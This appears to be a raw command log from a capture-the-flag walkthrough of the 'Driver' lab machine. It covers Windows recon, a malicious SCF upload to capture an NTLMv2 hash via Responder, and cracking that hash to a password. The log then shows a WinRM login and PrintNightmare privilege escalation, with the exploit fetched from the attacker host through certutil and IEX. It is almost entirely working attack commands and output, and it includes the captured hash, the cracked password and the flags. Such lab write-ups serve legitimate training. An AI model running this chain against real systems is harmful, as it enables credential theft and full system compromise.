$ nmap -p- -T4 -A 10.10.11.106
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-15 16:55 EDT
Nmap scan report for 10.10.11.106
Host is up (0.026s latency).
Not shown: 65531 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h59m55s, deviation: 0s, median: 6h59m55s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-10-16T03:58:12
|_ start_date: 2021-10-15T16:27:47
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 192.33 seconds
5985 winrm; 445 smb; 139NetBIOS
$ nmap -sC -sV -oN nmap 10.10.11.106 10.10.11.106
-sC: equivalent to --script=default
-oN filespec (normal output)
-sV: Probe open ports to determine service/version info
Null scan (-sN) Does not set any bits (TCP flag header is 0)
SCF File Attacks; SMB Exploit via NTLM Capture
upload
firmware.scf
[Shell]
Command=2
IconFile=\\10.10.14.207\share\test.ico
[Taskbar]
Command=ToggleDesktop
sudo responder -wrf --lm -v -I tun0
$ sudo responder -A -I tun0
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.106
[SMB] NTLMv2-SSP Username : DRIVER\tony
[SMB] NTLMv2-SSP Hash : tony::DRIVER:aaebafc4be3c49f8:7876DF0BDD05ADC3CB433FEB451DE1AC:010100000000000080856EFE05C2D70152B8CE442F2BFF3C0000000002000800300048004500380001001E00570049004E002D004700570030004B0044003200490034004B005200410004003400570049004E002D004700570030004B0044003200490034004B00520041002E0030004800450038002E004C004F00430041004C000300140030004800450038002E004C004F00430041004C000500140030004800450038002E004C004F00430041004C000700080080856EFE05C2D70106000400020000000800300030000000000000000000000000200000CF92C946336670BBCF45C1E8233EF4B06C6C6E3B75BA5AE7C6D57D46CFFE8B150A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E00320030003700000000000000000000000000
$ john -w:/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
liltony (tony)
1g 0:00:00:00 DONE (2021-10-15 20:52) 9.090g/s 297890p/s 297890c/s 297890C/s !!!!!!..eatme1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.1.1) starting...
OpenCL API (OpenCL 1.2 pocl 1.6, None+Asserts, LLVM 9.0.1, RELOC, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=============================================================================================================================
* Device #1: pthread-Intel(R) Xeon(R) CPU E3-1575M v5 @ 3.00GHz, 13889/13953 MB (4096 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Using pure kernels enables cracking longer passwords but for the price of drastically reduced performance.
If you want to switch to optimized backend kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 65 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
TONY::DRIVER:aaebafc4be3c49f8:7876df0bdd05adc3cb433feb451de1ac:010100000000000080856efe05c2d70152b8ce442f2bff3c0000000002000800300048004500380001001e00570049004e002d004700570030004b0044003200490034004b005200410004003400570049004e002d004700570030004b0044003200490034004b00520041002e0030004800450038002e004c004f00430041004c000300140030004800450038002e004c004f00430041004c000500140030004800450038002e004c004f00430041004c000700080080856efe05c2d70106000400020000000800300030000000000000000000000000200000cf92c946336670bbcf45c1e8233ef4b06c6c6e3b75ba5ae7c6d57d46cffe8b150a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e00320030003700000000000000000000000000:liltony
Session..........: hashcat
Status...........: Cracked
Hash.Name........: NetNTLMv2
Hash.Target......: TONY::DRIVER:aaebafc4be3c49f8:7876df0bdd05adc3cb433...000000
Time.Started.....: Fri Oct 15 20:50:40 2021 (0 secs)
Time.Estimated...: Fri Oct 15 20:50:40 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 408.7 kH/s (2.66ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 32768/14344385 (0.23%)
Rejected.........: 0/32768 (0.00%)
Restore.Point....: 28672/14344385 (0.20%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: softball27 -> eatme1
Started: Fri Oct 15 20:50:28 2021
Stopped: Fri Oct 15 20:50:41 2021
$ evil-winrm -i 10.10.11.106 -u 'tony' -p 'liltony'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tony\Documents>
*Evil-WinRM* PS C:\Users\tony\Desktop> type user.txt
b6919f936457f4e921d8842904774bc0
*Evil-WinRM* PS C:\Users\tony\Documents> ps
385 22 5224 14436 ...13 1168 spoolsv
$python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
certutil.exe -f -split -urlcache http://10.10.14.207:8000/winpeas.exe
https://github.com/calebstewart/CVE-2021-1675
certutil.exe -f -split -urlcache http://10.10.14.207:8000/printnightmare.ps1 printnightmare.ps1
*Evil-WinRM* PS C:\Users\tony\Downloads> import-module .\printnightmare.ps1
File C:\Users\tony\Downloads\printnightmare.ps1 cannot be loaded because running scripts is disabled on this system. For more information, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ import-module .\printnightmare.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : SecurityError: (:) [Import-Module], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess,Microsoft.PowerShell.Commands.ImportModuleCommand
*Evil-WinRM* PS C:\Users\tony\Downloads>
IEX(New-Object Net.Webclient).downloadstring('http://10.10.14.207:8000/CVE-2021-1675.ps1')
Invoke-Nightmare -NewUser "NotExistingUser" -NewPassword "p@ssword1"
*Evil-WinRM* PS C:\Users\tony\Downloads> net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
-------------------------------------------------------------------------------
Administrator
dedsec
NotExistingUser
The command completed successfully.
*Evil-WinRM* PS C:\Users\tony\Downloads>
ExecutionPolicy -Bypass
evil-winrm -i 10.10.11.106 -u 'NotExistingUser' -p 'p@ssword1'
kali@kali:~/0.htb/machines/Driver10.10.11.106$ evil-winrm -i 10.10.11.106 -u 'NotExistingUser' -p 'p@ssword1'
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\NotExistingUser\Documents> cd ..\..\administrator\Desktop
*Evil-WinRM* PS C:\Users\administrator\Desktop> dir
Directory: C:\Users\administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 10/16/2021 7:05 AM 34 root.txt
*Evil-WinRM* PS C:\Users\administrator\Desktop> cat root.txt
61b8662606ad94338c195222abdc99e7
*Evil-WinRM* PS C:\Users\administrator\Desktop>